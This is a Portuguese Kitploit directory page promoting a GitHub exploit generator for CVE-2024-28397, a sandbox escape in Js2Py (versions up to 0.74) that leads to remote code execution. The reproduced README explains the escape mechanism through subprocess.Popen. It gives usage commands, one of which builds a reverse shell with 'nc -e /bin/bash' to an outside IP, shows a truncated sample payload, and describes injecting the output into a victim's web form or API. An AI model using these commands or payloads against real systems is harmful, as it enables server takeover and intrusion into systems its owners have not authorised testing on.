Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Exploit profissional para CVE-2024-28397: Escape do Sandbox Js2Py levando à Execução Remota de Código (RCE). Inclui geração modular de payloads. | Kitploit
Ferramentas/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Exploit profissional para CVE-2024-28397: Escape do Sandbox Js2Py levando à Execução Remota de Código (RCE). Inclui geração modular de payloads.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver RepositórioSite
216há 7 mesesAinda não revisado
Compartilhar

Technical Briefing Preview

💡 Análise Aprofundada: Clique aqui para ler o briefing técnico completo (PDF).

CVE-2024-28397: Gerador de Payload para Escape de Sandbox do Js2Py

Python License CVE

Um gerador de payload profissional para CVE-2024-28397. Esta ferramenta gera código JavaScript malicioso projetado para escapar da sandbox do js2py (versões <= 0.74) e executar comandos arbitrários no sistema alvo.

🚨 Detalhes da Vulnerabilidade

  • ID CVE: CVE-2024-28397
  • Componente Afetado: Js2Py <= 0.74
  • Impacto: Execução Remota de Código (RCE) / Escape de Sandbox
  • Mecanismo: Explora Object.getOwnPropertyNames para acessar a classe subprocess.Popen do Python a partir do ambiente JavaScript.

🚀 Uso

Este script gera o payload JavaScript exato necessário para explorar a vulnerabilidade. Você não precisa instalar o js2py para usar esta ferramenta.

1. Gerar um Payload

Execute o script com o comando que deseja executar na máquina da vítima.

# Gerar payload para executar 'id'
python3 exploit.py -c "id"
# Gerar payload para um Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. Atacar o Alvo

Copie a saída gerada pela ferramenta e injete-a na aplicação vulnerável (por exemplo, um formulário web, endpoint de API ou arquivo de configuração que seja interpretado pelo js2py).

Exemplo de Injeção: Se um site recebe entrada do usuário e a executa com js2py.eval_js(user_input), colar o código gerado executará seu comando no servidor deles.

📝 Exemplo

$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (código malicioso completo) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 Autor

Ali Sünbül (xeloxa)

  • 📧 Email: [email protected]
  • 🌐 Website: xeloxa.netlify.app
  • 🐙 GitHub: @xeloxa

⚠️ Aviso Legal

Este software é fornecido exclusivamente para fins educacionais e de pesquisa em segurança. O autor não se responsabiliza por qualquer uso indevido deste código. Certifique-se de ter permissão explícita antes de testar isto em qualquer sistema que não seja de sua propriedade.

Baixar ferramenta